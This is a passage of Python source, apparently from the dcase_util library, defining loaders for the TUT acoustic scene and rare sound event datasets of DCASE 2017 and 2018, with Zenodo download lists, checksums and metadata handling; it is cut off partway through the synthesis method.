content
stringlengths 7
928k
| avg_line_length
float64 3.5
33.8k
| max_line_length
int64 6
139k
| alphanum_fraction
float64 0.08
0.96
| licenses
sequence | repository_name
stringlengths 7
104
| path
stringlengths 4
230
| size
int64 7
928k
| lang
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import
import collections
import hashlib
import os
import pickle
import sys
import numpy
import yaml
from six import iteritems
from tqdm import tqdm
from dcase_util.datasets import AcousticSceneDataset, SyntheticSoundEventDataset, SoundEventDataset
from dcase_util.containers import MetaDataContainer, MetaDataItem, OneToOneMappingContainer, \
DictContainer, ParameterContainer
from dcase_util.utils import Path
# =====================================================
# DCASE 2018
# =====================================================
class TUTUrbanAcousticScenes_2018_DevelopmentSet(AcousticSceneDataset):
"""TUT Urban Acoustic Scenes 2018 Development dataset
This dataset is used in DCASE2018 - Task 1, Acoustic scene classification / Subtask A
"""
def __init__(self,
storage_name='TUT-urban-acoustic-scenes-2018-development',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-urban-acoustic-scenes-2018-development'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'scene'
kwargs['dataset_meta'] = {
'authors': 'Toni Heittola, Annamaria Mesaros, and Tuomas Virtanen',
'title': 'TUT Urban Acoustic Scenes 2018, development dataset',
'url': None,
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Zoom F8',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = 1
kwargs['meta_filename'] ='meta.csv'
filename_base = 'TUT-urban-acoustic-scenes-2018-development'
source_url = 'https://zenodo.org/record/1228142/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + filename_base + '.doc.zip',
'remote_bytes': 10517,
'remote_md5': '28a4a9c46a6f46709ecc8eece365a3a4',
'filename': filename_base + '.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + filename_base + '.meta.zip',
'remote_bytes': 69272,
'remote_md5': 'e196065ee83c07af03a11a310364377d',
'filename': filename_base + '.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.1.zip',
'remote_bytes': 1657811579,
'remote_md5': '62f97087c447e29def8716204469bf89',
'filename': filename_base + '.audio.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.2.zip',
'remote_bytes': 1783489370,
'remote_md5': '8e569a92025d82bff6b02b956d7c6dc9',
'filename': filename_base + '.audio.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.3.zip',
'remote_bytes': 1809675304,
'remote_md5': '00d2020582a4535af5e65322fb2bad56',
'filename': filename_base + '.audio.3.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.4.zip',
'remote_bytes': 1756582525,
'remote_md5': 'd691eb4271f83ba6ba9a28797accc497',
'filename': filename_base + '.audio.4.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.5.zip',
'remote_bytes': 1724002546,
'remote_md5': 'c4d64b5483b60f85e9fe080b3435a6be',
'filename': filename_base + '.audio.5.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.6.zip',
'remote_bytes': 1645753049,
'remote_md5': '2f0feee78f216697eb19497714d97642',
'filename': filename_base + '.audio.6.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.7.zip',
'remote_bytes': 1671903917,
'remote_md5': '07cfefe80a0731de6819181841239f3a',
'filename': filename_base + '.audio.7.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.8.zip',
'remote_bytes': 1673304843,
'remote_md5': '213f3c012859c2e9dcb74aacc8558458',
'filename': filename_base + '.audio.8.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.9.zip',
'remote_bytes': 1674839259,
'remote_md5': 'b724442b09abcb3bd095ebff497cef85',
'filename': filename_base + '.audio.9.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.10.zip',
'remote_bytes': 1662932947,
'remote_md5': 'a27a32fa52e283ed8013375b8a16f269',
'filename': filename_base + '.audio.10.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.11.zip',
'remote_bytes': 1751473843,
'remote_md5': '7073a121e825ffef99832507f30d6644',
'filename': filename_base + '.audio.11.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.12.zip',
'remote_bytes': 1742332198,
'remote_md5': '6567aa61db12776568b6267ce122fb18',
'filename': filename_base + '.audio.12.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.13.zip',
'remote_bytes': 798990513,
'remote_md5': 'd00eeb2db0e093d8975521323a96c519',
'filename': filename_base + '.audio.13.zip'
}
]
kwargs['audio_paths'] = [
'audio'
]
super(TUTUrbanAcousticScenes_2018_DevelopmentSet, self).__init__(**kwargs)
def process_meta_item(self, item, absolute_path=True, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
if not item.identifier:
item.identifier = '-'.join(os.path.splitext(os.path.split(item.filename)[-1])[0].split('-')[1:-2])
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
meta_data = collections.OrderedDict()
for fold in self.folds():
# Read train files in
fold_data = MetaDataContainer(
filename=self.evaluation_setup_filename(
setup_part='train',
fold=fold
)
).load()
# Read eval files in
fold_data += MetaDataContainer(
filename=self.evaluation_setup_filename(
setup_part='evaluate',
fold=fold
)
).load()
# Process, make sure each file is included only once.
for item in fold_data:
if item.filename not in meta_data:
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data[item.filename] = item
# Save meta
MetaDataContainer(list(meta_data.values())).save(
filename=self.meta_file
)
# Load meta and cross validation
self.load()
return self
class TUTUrbanAcousticScenes_2018_Mobile_DevelopmentSet(AcousticSceneDataset):
"""TUT Urban Acoustic Scenes 2018 Mobile Development dataset
This dataset is used in DCASE2018 - Task 1, Acoustic scene classification / Subtask B
"""
def __init__(self,
storage_name='TUT-urban-acoustic-scenes-2018-mobile-development',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-urban-acoustic-scenes-2018-mobile-development'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'scene'
kwargs['dataset_meta'] = {
'authors': 'Toni Heittola, Annamaria Mesaros, and Tuomas Virtanen',
'title': 'TUT Urban Acoustic Scenes 2018 Mobile, development dataset',
'url': None,
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Various',
'microphone_model': 'Various',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = 1
kwargs['meta_filename'] = 'meta.csv'
filename_base = 'TUT-urban-acoustic-scenes-2018-mobile-development'
source_url = 'https://zenodo.org/record/1228235/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + filename_base + '.doc.zip',
'remote_bytes': 12144,
'remote_md5': '5694e9cdffa11cef8ec270673dc19ba0',
'filename': filename_base + '.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + filename_base + '.meta.zip',
'remote_bytes': 88425,
'remote_md5': 'b557b6d5d620aa4f15564ab38f1594d4',
'filename': filename_base + '.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.1.zip',
'remote_bytes': 1692337547,
'remote_md5': 'd6f2671af84032b97f393354c124517d',
'filename': filename_base + '.audio.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.2.zip',
'remote_bytes': 1769203601,
'remote_md5': 'db8b3603af5d4e559869a592930a7620',
'filename': filename_base + '.audio.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.3.zip',
'remote_bytes': 1674610746,
'remote_md5': '703bf73523a6ad1f40d4923cb8ba3ff0',
'filename': filename_base + '.audio.3.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.4.zip',
'remote_bytes': 1634599587,
'remote_md5': '18af04ab5d6f15a72c66f16bfec0ca07',
'filename': filename_base + '.audio.4.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.5.zip',
'remote_bytes': 1640894390,
'remote_md5': 'a579efb032f209a7e77fe22e4808e9ca',
'filename': filename_base + '.audio.5.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.6.zip',
'remote_bytes': 1693974078,
'remote_md5': 'c2c56691047b3be3d98cb0ffd6858d9f',
'filename': filename_base + '.audio.6.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + filename_base + '.audio.7.zip',
'remote_bytes': 1165383562,
'remote_md5': 'e182e5300867f4ed4b580389cc5b931e',
'filename': filename_base + '.audio.7.zip'
}
]
kwargs['audio_paths'] = [
'audio'
]
super(TUTUrbanAcousticScenes_2018_Mobile_DevelopmentSet, self).__init__(**kwargs)
def process_meta_item(self, item, absolute_path=True, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
if not item.identifier:
item.identifier = '-'.join(os.path.splitext(os.path.split(item.filename)[-1])[0].split('-')[1:-2])
if not item.source_label:
item.source_label = os.path.splitext(os.path.split(item.filename)[-1])[0].split('-')[-1]
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
meta_data = collections.OrderedDict()
for fold in self.folds():
# Read train files in
fold_data = MetaDataContainer(
filename=self.evaluation_setup_filename(
setup_part='train',
fold=fold
)
).load()
# Read eval files in
fold_data += MetaDataContainer(
filename=self.evaluation_setup_filename(
setup_part='evaluate',
fold=fold
)
).load()
# Process, make sure each file is included only once.
for item in fold_data:
if item.filename not in meta_data:
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data[item.filename] = item
# Save meta
MetaDataContainer(list(meta_data.values())).save(
filename=self.meta_file
)
# Load meta and cross validation
self.load()
return self
# =====================================================
# DCASE 2017
# =====================================================
class TUTAcousticScenes_2017_DevelopmentSet(AcousticSceneDataset):
"""TUT Acoustic scenes 2017 development dataset
This dataset is used in DCASE2017 - Task 1, Acoustic scene classification
"""
def __init__(self,
storage_name='TUT-acoustic-scenes-2017-development',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-acoustic-scenes-2017-development'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'scene'
kwargs['dataset_meta'] = {
'authors': 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Acoustic Scenes 2017, development dataset',
'url': None,
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Roland Edirol R-09',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = 4
source_url = 'https://zenodo.org/record/400515/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.doc.zip',
'remote_bytes': 54796,
'remote_md5': '2065495aaf3f1103e795c9899e2af1df',
'filename': 'TUT-acoustic-scenes-2017-development.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.meta.zip',
'remote_bytes': 104321,
'remote_md5': '9007fd4772d816590c5db5f5e9568f5d',
'filename': 'TUT-acoustic-scenes-2017-development.meta.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.error.zip',
'remote_bytes': 1432,
'remote_md5': '802c700b021769e52a2c1e3b9c117a1b',
'filename': 'TUT-acoustic-scenes-2017-development.error.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.1.zip',
'remote_bytes': 1071445248,
'remote_md5': '251325a9afaaad0326ad1c57f57d514a',
'filename': 'TUT-acoustic-scenes-2017-development.audio.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.2.zip',
'remote_bytes': 1073453613,
'remote_md5': 'c26861e05147dc319b4250eb103d9d99',
'filename': 'TUT-acoustic-scenes-2017-development.audio.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.3.zip',
'remote_bytes': 1073077819,
'remote_md5': 'a4815775f8a5e629179726ee4cd4f55a',
'filename': 'TUT-acoustic-scenes-2017-development.audio.3.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.4.zip',
'remote_bytes': 1072822038,
'remote_md5': '1732b03afe8c53ef8bba80ba14766e57',
'filename': 'TUT-acoustic-scenes-2017-development.audio.4.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.5.zip',
'remote_bytes': 1072644652,
'remote_md5': '611be754a0c951185c6ae4b7643c19a0',
'filename': 'TUT-acoustic-scenes-2017-development.audio.5.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.6.zip',
'remote_bytes': 1072667888,
'remote_md5': '165a201db800d3ea76fce5a9c2bd97d7',
'filename': 'TUT-acoustic-scenes-2017-development.audio.6.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.7.zip',
'remote_bytes': 1073417661,
'remote_md5': 'c7d79db84264401c0f8680dcc36013ad',
'filename': 'TUT-acoustic-scenes-2017-development.audio.7.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.8.zip',
'remote_bytes': 1072381222,
'remote_md5': '35043f25123439392338c790494c7a19',
'filename': 'TUT-acoustic-scenes-2017-development.audio.8.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.9.zip',
'remote_bytes': 1072087738,
'remote_md5': '0805dcf5d8e6871dc9610182b2efb93a',
'filename': 'TUT-acoustic-scenes-2017-development.audio.9.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-development.audio.10.zip',
'remote_bytes': 1046262120,
'remote_md5': '5df83a191295a04e290b125c634e13e7',
'filename': 'TUT-acoustic-scenes-2017-development.audio.10.zip'
}
]
kwargs['audio_paths'] = [
'audio'
]
super(TUTAcousticScenes_2017_DevelopmentSet, self).__init__(**kwargs)
def process_meta_item(self, item, absolute_path=True, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
raw_path, raw_filename = os.path.split(item.filename)
item.identifier = raw_filename.split('_')[0]
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
meta_data = collections.OrderedDict()
for fold in self.folds():
# Read train files in
fold_data = MetaDataContainer(
filename=self.evaluation_setup_filename(setup_part='train', fold=fold)
).load()
# Read eval files in
fold_data += MetaDataContainer(
filename=self.evaluation_setup_filename(setup_part='evaluate', fold=fold)
).load()
# Process, make sure each file is included only once.
for item in fold_data:
if item.filename not in meta_data:
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data[item.filename] = item
# Save meta
MetaDataContainer(list(meta_data.values())).save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
class TUTAcousticScenes_2017_EvaluationSet(AcousticSceneDataset):
"""TUT Acoustic scenes 2017 evaluation dataset
This dataset is used in DCASE2017 - Task 1, Acoustic scene classification
"""
def __init__(self,
storage_name='TUT-acoustic-scenes-2017-evaluation',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-acoustic-scenes-2017-evaluation'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'scene'
kwargs['dataset_meta'] = {
'authors': 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Acoustic Scenes 2017, development dataset',
'url': None,
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Roland Edirol R-09',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = None
source_url = 'https://zenodo.org/record/1040168/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-evaluation.doc.zip',
'remote_bytes': 53687,
'remote_md5': '53709a07416ea3b617c02fcf67dbeb9c',
'filename': 'TUT-acoustic-scenes-2017-evaluation.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-evaluation.meta.zip',
'remote_bytes': 4473,
'remote_md5': '200eee9493e8044403e1326e3d05cfde',
'filename': 'TUT-acoustic-scenes-2017-evaluation.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-evaluation.audio.1.zip',
'remote_bytes': 1071856687,
'remote_md5': '3d6dda4445871e9544e0fefe7d14c7d9',
'filename': 'TUT-acoustic-scenes-2017-evaluation.audio.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-evaluation.audio.2.zip',
'remote_bytes': 1073362972,
'remote_md5': '4085ef5fa286f2169074993a4e405953',
'filename': 'TUT-acoustic-scenes-2017-evaluation.audio.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-evaluation.audio.3.zip',
'remote_bytes': 1071521152,
'remote_md5': 'cac432579e7cf2dff0aec7aaed248956',
'filename': 'TUT-acoustic-scenes-2017-evaluation.audio.3.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2017-evaluation.audio.4.zip',
'remote_bytes': 382756463,
'remote_md5': '664bf09c3d24bd26c6b587f1d709de36',
'filename': 'TUT-acoustic-scenes-2017-evaluation.audio.4.zip'
},
]
kwargs['audio_paths'] = ['audio']
super(TUTAcousticScenes_2017_EvaluationSet, self).__init__(**kwargs)
def process_meta_item(self, item, absolute_path=True, filename_map=None, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
filename_map : OneToOneMappingContainer
Filename map
Default value None
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
if filename_map and item.filename in filename_map:
filename_mapped = filename_map.map(item.filename)
item.identifier = os.path.split(filename_mapped)[1].split('_')[0]
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
if os.path.isfile(self.evaluation_setup_filename(setup_part='evaluate')):
meta_data = collections.OrderedDict()
# Read files in
data = MetaDataContainer(
filename=os.path.join(self.evaluation_setup_path, 'evaluate.txt')
).load()
# Load filename mapping
map_filename = os.path.join(self.evaluation_setup_path, 'map.txt')
if os.path.exists(map_filename):
filename_map = OneToOneMappingContainer(filename=map_filename).load()
else:
filename_map = {}
for item in data:
if item.filename not in meta_data:
self.process_meta_item(
item=item,
absolute_path=False,
filename_map=filename_map
)
meta_data[item.filename] = item
# Save meta
MetaDataContainer(list(meta_data.values())).save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
class TUTRareSoundEvents_2017_DevelopmentSet(SyntheticSoundEventDataset):
"""TUT Acoustic scenes 2017 development dataset
This dataset is used in DCASE2017 - Task 2, Rare sound event detection
"""
def __init__(self,
storage_name='TUT-rare-sound-events-2017-development',
data_path=None,
included_content_types=None,
synth_parameters=None,
dcase_compatibility=True,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-rare-sound-events-2017-development'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
synth_parameters : dict
Data synthesis parameters.
Default value None
dcase_compatibility : bool
Ensure that dataset is generated same way than in DCASE2017 Challenge setup
Default value True
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['filelisthash_exclude_dirs'] = kwargs.get(
'filelisthash_exclude_dirs',
[os.path.join('data', 'mixture_data')]
)
kwargs['dataset_group'] = 'event'
kwargs['dataset_meta'] = {
'authors': 'Aleksandr Diment, Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Rare Sound Events 2017, development dataset',
'url': None,
'audio_source': 'Synthetic',
'audio_type': 'Natural',
'recording_device_model': 'Unknown',
'microphone_model': 'Unknown',
}
kwargs['crossvalidation_folds'] = 1
source_url = 'https://zenodo.org/record/401395/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.doc.zip',
'remote_bytes': 21042,
'remote_md5': '47c424fe90d2bdc53d9fdd84341c2783',
'filename': 'TUT-rare-sound-events-2017-development.doc.zip'
},
{
'content_type': 'code',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.code.zip',
'remote_bytes': 81518,
'remote_md5': '4cacdf0803daf924a60bf9daa573beb7',
'filename': 'TUT-rare-sound-events-2017-development.code.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.1.zip',
'remote_bytes': 1072175672,
'remote_md5': '6f1f4156d41b541d1188fcf44c9a8267',
'filename': 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.2.zip',
'remote_bytes': 1073378284,
'remote_md5': 'ff5dcbe250e45cc404b7b8a6013002ac',
'filename': 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.3.zip',
'remote_bytes': 1069766123,
'remote_md5': 'fb356ae309a40d2f0a38fc1c746835cb',
'filename': 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.3.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.4.zip',
'remote_bytes': 1070042681,
'remote_md5': '2a68575b2ec7a69e2cc8b16b87fae0c9',
'filename': 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.4.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.5.zip',
'remote_bytes': 1073380909,
'remote_md5': '84e70d855457a18115108e42ec04501a',
'filename': 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.5.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.6.zip',
'remote_bytes': 1073021941,
'remote_md5': '048ce898bd434097dd489027f7ba361d',
'filename': 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.6.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.7.zip',
'remote_bytes': 1069890239,
'remote_md5': '3ef1c89fcfac39918a5edc5abc6ed29b',
'filename': 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.7.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.8.zip',
'remote_bytes': 180860904,
'remote_md5': '69dcb81e70f4e6605e178693afcd7722',
'filename': 'TUT-rare-sound-events-2017-development.source_data_bgs_and_cvsetup.8.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-rare-sound-events-2017-development.source_data_events.zip',
'remote_bytes': 639119477,
'remote_md5': 'dc4b7eb77078b4cf1b670c6362679473',
'filename': 'TUT-rare-sound-events-2017-development.source_data_events.zip'
}
]
kwargs['audio_paths'] = ['audio']
default_synth_parameters = DictContainer({
'train': {
'seed': 42,
'event_presence_prob': 0.5,
'mixtures_per_class': 500,
'ebr_list': [-6, 0, 6],
},
'test': {
'seed': 42,
'event_presence_prob': 0.5,
'mixtures_per_class': 500,
'ebr_list': [-6, 0, 6],
}
})
if synth_parameters is None:
synth_parameters = {}
# Override synth parameters
synth_parameters = default_synth_parameters.merge(synth_parameters)
# Meta filename depends on synth_parameters
kwargs['meta_filename'] = 'meta_'+synth_parameters.get_hash_for_path()+'.txt'
self.synth_parameters = synth_parameters
# Add parameter hash
self.synth_parameters['train']['param_hash'] = hashlib.md5(
yaml.dump(
{
'event_presence_prob': self.synth_parameters['train']['event_presence_prob'],
'mixtures_per_class': self.synth_parameters['train']['mixtures_per_class'],
'ebrs': self.synth_parameters['train']['ebr_list'],
'seed': self.synth_parameters['train']['seed']
}
).encode('utf-8')).hexdigest()
self.synth_parameters['test']['param_hash'] = hashlib.md5(
yaml.dump(
{
'event_presence_prob': self.synth_parameters['test']['event_presence_prob'],
'mixtures_per_class': self.synth_parameters['test']['mixtures_per_class'],
'ebrs': self.synth_parameters['test']['ebr_list'],
'seed': self.synth_parameters['test']['seed']
}
).encode('utf-8')).hexdigest()
self.dcase_compatibility = dcase_compatibility
# Initialize baseclass
super(TUTRareSoundEvents_2017_DevelopmentSet, self).__init__(**kwargs)
# Add code package to be downloaded always
if 'code' not in self.included_content_types or 'all' not in self.included_content_types:
self.included_content_types.append('code')
def event_labels(self, scene_label=None):
"""List of unique event labels in the meta data.
Parameters
----------
Returns
-------
labels : list
List of event labels in alphabetical order.
"""
labels = ['babycry', 'glassbreak', 'gunshot']
labels.sort()
return labels
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
# Make sure evaluation_setup directory exists
Path().makedirs(path=os.path.join(self.local_path, self.evaluation_setup_folder))
return self
def synthesize(self):
# Create init so we can call functions
if os.path.exists(os.path.join(self.local_path, 'TUT_Rare_sound_events_mixture_synthesizer', '__init__.py')):
open(os.path.join(self.local_path, 'TUT_Rare_sound_events_mixture_synthesizer', '__init__.py'), 'a').close()
# Add synth code to the search path
sys.path.append(os.path.join(self.local_path, 'TUT_Rare_sound_events_mixture_synthesizer'))
from core import generate_mixture_recipes
from core import do_mixing
scene_label = 'synthetic'
subset_map = {'train': 'devtrain',
'test': 'devtest'}
data_path = os.path.join(os.path.abspath(self.local_path), 'data')
set_progress = tqdm(['train', 'test'],
desc="{0: <25s}".format('Set'),
file=sys.stdout,
leave=False,
disable=self.disable_progress_bar,
ascii=self.use_ascii_progress_bar)
for subset_label in set_progress:
if self.log_system_progress:
self.logger.info(' {title:<15s} [{subset_label:<30s}]'.format(
title='Set ',
subset_label=subset_label)
)
# Translated subset name
subset_name_on_disk = subset_map[subset_label]
# Get parameters
mixing_params = {
'event_presence_prob': self.synth_parameters[subset_label]['event_presence_prob'],
'mixtures_per_class': self.synth_parameters[subset_label]['mixtures_per_class'],
'ebrs': self.synth_parameters[subset_label]['ebr_list'],
'seed': self.synth_parameters[subset_label]['seed']
}
# Get parameter hash
param_hash = self.synth_parameters[subset_label]['param_hash']
# Save parameters
mixture_parameters = os.path.join(
self.local_path, 'data', 'mixture_data', subset_name_on_disk, param_hash, 'parameters.yaml'
)
if not os.path.isfile(mixture_parameters):
# Make sure directory exists
Path().makedirs(
path=os.path.join(self.local_path, 'data', 'mixture_data', subset_name_on_disk, param_hash)
